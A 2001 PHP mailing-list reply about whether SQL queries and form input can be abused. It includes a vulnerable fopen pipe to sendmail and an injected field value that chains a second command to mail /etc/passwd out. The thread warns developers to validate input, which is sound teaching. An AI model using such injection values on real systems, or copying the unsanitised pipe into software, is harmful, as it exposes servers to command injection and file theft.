Re: Re: Mommy, is it true that...?
| From: | Philip Hallstrom | Date: | Fri, 21 Dec 2001 02:21:50 +0000 |
| Subject: | Re: Re: Mommy, is it true that...? | ||
| References: | 1 | Groups: | php.general |
| Request: | Send a blank email to php-general+get-78389@lists.php.net to get a copy of this message | ||
> At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
> > > I've done something similar in the past just for kicks, and I got the same
> > > result you did (i.e. an error). I believe this is because mysql_query()
> > > expects ONE query at a time and will break if you send two or more. I
> > > could be completely and totally wrong about that, though (someone please
> > > correct me if I am)...
> >
> >Maybe this one failed, but it's always a good idea to check user input.
> >Let's say you're emailing a form and you don't use the mail() function,
> >but make a call directly to sendmail... and you're sloppy... so you do
> >this:
> [...]
>
> True. But we were speaking specifically about MySQL. When you start
> toying with external programs and exec() and so forth then you've opened up
> a whole other can of worms security-wise...
True, but why take the chance? :) I didn't see an equivalent for MySQL,
but PostgreSQL has a pg_put_line() which just sends a NULL terminated
string to the backend so you can do whatever you want (ie. multi
statement). So in that case things could get messed up.
>
> >$fp = fopen("|/usr/bin/sendmail $sendto");
> >#write stuff to pipe to send email...
> >
> >Now... what if when I filled out the form I set $sendto equal to this:
> >
> >philip@adhesivemedia.com; /usr/bin/mail philip@adhesivemedia.com < /etc/passwd
>
> A definite possibility, but it does depend on the hacker in question
> knowing exactly how your script is written...
True, but in a shared hosting environment this is very likely.
-philip